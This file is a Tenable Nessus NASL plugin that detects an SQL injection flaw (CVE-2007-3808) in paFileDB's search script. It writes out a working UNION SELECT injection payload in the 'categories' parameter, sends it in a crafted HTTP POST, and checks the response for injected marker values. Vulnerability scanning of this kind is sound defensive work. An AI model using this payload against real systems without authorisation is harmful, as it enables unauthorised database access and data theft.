#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(25708);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-3808");
  script_bugtraq_id(24914);
  script_xref(name:"OSVDB", value:"36247");

  script_name(english:"paFileDB categories parameter SQL Injection Vulnerability");
  script_summary(english:"Tries to control search results");

  desc = "
Synopsis :

The remote web server contains a PHP script that is prone to SQL a
injection attack. 

Description :

The version of paFileDB installed on the remote host fails to sanitize
user-supplied input to the 'categories' parameter before using it in
the 'includes/search.php' script to make database queries.  An
unauthenticated attacker can exploit this issue to manipulate database
queries, which may lead to disclosure of sensitive information,
modification of data, or attacks against the underlying database. 

See also :

http://www.milw0rm.com/exploits/4186

Solution :

Unknown at this time.

Risk factor : 

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("pafiledb_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/pafiledb"));

if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  magic1 = unixtime();
  magic2 = rand();
  exploit = string("1) UNION SELECT ALL null,", magic1, ",", magic2, crap(data:",null", length:85), " /*");
  postdata = string(
    "query=", SCRIPT_NAME, "&",
    "search_in[]=file_name&",
    "search_in[]=file_desc&",
    "search_in[]=file_longdesc&",
    "search_in[]=file_creator&",
    "search_in[]=file_version&",
    "categories[]=", exploit
  );
  req = string(
    "POST ", dir, "/index.php?act=search&process HTTP/1.1\r\n",
    "Host: ", get_host_name(), "\r\n",
    "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
    "Content-Type: application/x-www-form-urlencoded\r\n",
    "Content-Length: ", strlen(postdata), "\r\n",
    "\r\n",
    postdata
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we see our magic in the right places in the search results.
  if (
    string("Search Results For: ", SCRIPT_NAME) >< res &&
    string('act=view&amp;id=">', magic1, "</") >< res &&
    string('class="small">', magic2, "</") >< res
  )
  {
    security_hole(port);
    exit(0);
  }
}
